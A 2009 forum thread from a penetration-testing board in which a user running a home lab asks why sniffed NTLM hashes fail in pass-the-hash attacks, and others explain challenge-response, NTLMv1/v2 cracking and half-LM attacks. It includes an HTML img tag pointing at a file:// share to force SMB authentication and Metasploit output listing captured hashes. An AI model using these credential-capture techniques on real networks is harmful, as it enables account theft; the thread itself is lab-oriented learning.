.

Pass-the-hash question

<<

d3l0n

Jr. Member
Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Thu Nov 12, 2009 9:46 pm

Pass-the-hash question

Is it possible to use a sniffed hash for a connection between Windows XP station and Windows 2003 domain controller in pass-the-hash technique?

Or it is possible only if one used a tool like pass-the-hash tool kit on the Windows XP station, or had it authenticate to a station that is running metasploit smb module?

Thanks
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Fri Nov 13, 2009 6:38 am

Re: Pass-the-hash question

as long as you have a utility that will pass-the-hash, I'm pretty sure you can use the proper hash no matter where you got it from.
<<

d3l0n

Jr. Member
Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Fri Nov 13, 2009 5:24 pm

Re: Pass-the-hash question

Thank you BillV.

I tried the sniffed hash with metasploit and and smbshell but it did not work. So I'm guessing it works only with pass-the-hash tool kit I have to try it with this tool though before I conclude.

Here is my environment if that can help.

I have one domain one (Name DC) workstation connect to the domain (Named W1) and one workstation that is in workgroup (s1). I also have an ubuntu version running metasploit 3.3rc1 and nessus 4.

I have cain and able installed on s1 and use it to sniff connections between DC and W1 and also between W1 and s1. The hashes I sniffed I used in metasploit and smbshell as mentioned before, but with not luck.

I tried running smb module in metasploit and had s1 connect to it via URL link with image source set as \\ubuntu\image\trick.gif. But I did not capture anything when I open the html page from s1.

Any idea? Did I do anything wrong?

Thanks in advance for the help.
<<

d3l0n

Jr. Member
Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Fri Nov 13, 2009 5:54 pm

Re: Pass-the-hash question

This is capture I have gathered using smb module from s1
  Code:
msf auxiliary(smb) > run
[*] Auxiliary module execution completed

[*] Server started.
msf auxiliary(smb) > [*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e4c33d3f1f2ef7952138d27242654f7a010100000000000029a52bd3b164ca013e2d8eb406b3f0d400000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:3a453950d098e9b59f88eaa5628bee520101000000000000f9ea2fd3b164ca0112a09ea79a0a637900000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:95782ca14bd78a4c70be953811709d71010100000000000098bb33d3b164ca01ae0245df301f235500000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:8ea08aa689958a547540711096d14aee0101000000000000680138d3b164ca0190afd31a5d8b575a00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:aec3bb6e5d2f6f12bd83c0ef46a9e139010100000000000069bc3cd3b164ca015948d33cd527cce100000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:1ded841a3d184703ef5b115de99d8b3001010000000000004a2941d3b164ca0153d0e59769fe94de00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e8b28d52e979c73f8ef6e8d6dd00ec120101000000000000094845d3b164ca016abaf5dd251d583700000000020000000000000000000000 OS: LM:


You can see that for the same session (loading one page once) I gathered multiple NTLM hash values. And these values need "some processing" before getting the real NTLM hash
<<

timmedin

User avatar

Sr. Member
Sr. Member

Posts: 469

Joined: Thu Feb 05, 2009 11:18 pm

Post Sun Nov 15, 2009 12:18 pm

Re: Pass-the-hash question

I believe you are talking about three different scenarios and each works differnetly.

1. Sniffing - When sniffing the authentication between two machines there is a "challenge" value used. If you don't know this value you won't be able to use the hash.

2. MSF SMB - This uses a static hash on the client (the metasploit box) so the hash can be retrieved. MSF handles this for you and you can use these hashes in the pash the hash attack.

3. Dump - These hashes can be used for hash the hash

So that explains why your sniffing didn't work.

I don't know why your \\ubuntu\blah\blah didn't work. If you "ping ubuntu" from the other machine does it work? My assumption is that it can't resolve "ubuntu" and fails before it even tries to connect.
twitter.com/timmedin | http://blog.securitywhole.com
<<

d3l0n

Jr. Member
Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Mon Nov 16, 2009 1:38 pm

Re: Pass-the-hash question

Thanks so much timmedin for the detail explanation.

In my previous post, I posted a capture I gathered from msf smb module. What I did to the html page to make it work is that I change the img url to this <img src="file://ubuntu/blah/blah.img" >

But as you can see from the capture LM is not used at all. NTLM hash is much longer than the usual. I'm not sure if there is further tweaks needs to be done to the hash to make it usable, or if it can't be used at all.

Any idea?

thx
<<

d3l0n

Jr. Member
Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Tue Nov 24, 2009 2:40 am

Re: Pass-the-hash question

1. Sniffing - When sniffing the authentication between two machines there is a "challenge" value used. If you don't know this value you won't be able to use the hash.


How hard/easy it is for an attacker to guess/crack the challenge? What if both the workstation and the server only supports NTLM or only NTLMv2?

Thanks
<<

timmedin

User avatar

Sr. Member
Sr. Member

Posts: 469

Joined: Thu Feb 05, 2009 11:18 pm

Post Sun Nov 29, 2009 12:27 am

Re: Pass-the-hash question

Did you try using Cain & Abel or Opht to crack it? Since you have the password hash that is "encrypted" with the challenge you can't use it in a pash the hash attack. You need just the password hash to use it in the pash the hash attack.
twitter.com/timmedin | http://blog.securitywhole.com
<<

timmedin

User avatar

Sr. Member
Sr. Member

Posts: 469

Joined: Thu Feb 05, 2009 11:18 pm

Post Sun Nov 29, 2009 12:29 am

Re: Pass-the-hash question

Here is the blog post from metasploit.com on the subject.
http://blog.metasploit.com/2008/11/ms08 ... relay.html
twitter.com/timmedin | http://blog.securitywhole.com
<<

d3l0n

Jr. Member
Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Mon Nov 30, 2009 1:03 am

Re: Pass-the-hash question

Thanks much timmedin. Incidentally I was reading the post you kindly provided a link to.

This is my understanding on the subject. Cracking a sniffed challenge-response hash to get the password hash is not an easy task (time wise) when the challenge key is not known. If the challenge key is known, the process will be much easier. This is however if LM/NTLM challenge-response is sniffed, however if NTLMv2 is sniffed, it will be extremely hard to do.

Thanks a lot timmedin for all your help in this post.
Last edited by d3l0n on Mon Nov 30, 2009 1:05 am, edited 1 time in total.
<<

apollo

Full Member
Full Member

Posts: 146

Joined: Fri Apr 04, 2008 7:44 pm

Post Mon Nov 30, 2009 1:18 am

Re: Pass-the-hash question

If you get bored, I have some stuff on capturing challenge hashes and having fun with them in my presentation at http://www.sector.ca/presentations.htm.&nbsp; Basically, if you have a static challenge for NTLMv1 auth, then you haven't really increased complexity of cracking the password by very much.  The reason for this is for NTLMv1 only the server sets a challenge.  In NTLMv2 then both the client and the server have set a challenge and so it almost makes it impossible to use any sort of time-tradeoff method such as rainbow tables to crack the password.  You are left with brute force.  The two challenges don't increase the complexity significantly over having a single random challenge, but it does mean that having control over one of the challenges will not help you much.  Turning off LM also increases the complexity of cracking NTLMv1 challenge/response as you are left having to crack a whole hash instead of with the LM portion of NTLMv1 you can perform an attack known as a half-lm challenge attack which will get you the first 8 characters of the password a lot faster, and then allow you to only brute force the last X characters of the password.  If the password is < 11 characters, the time isn't significant.  Passwords over 11 characters still require a fair amount of time, and it goes up exponentially as you add characters. 

Anyway, hope this helps some.
-Ryan
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
<<

d3l0n

Jr. Member
Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Wed Dec 02, 2009 1:34 pm

Re: Pass-the-hash question

Very informative Ryan, thank you so much!

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software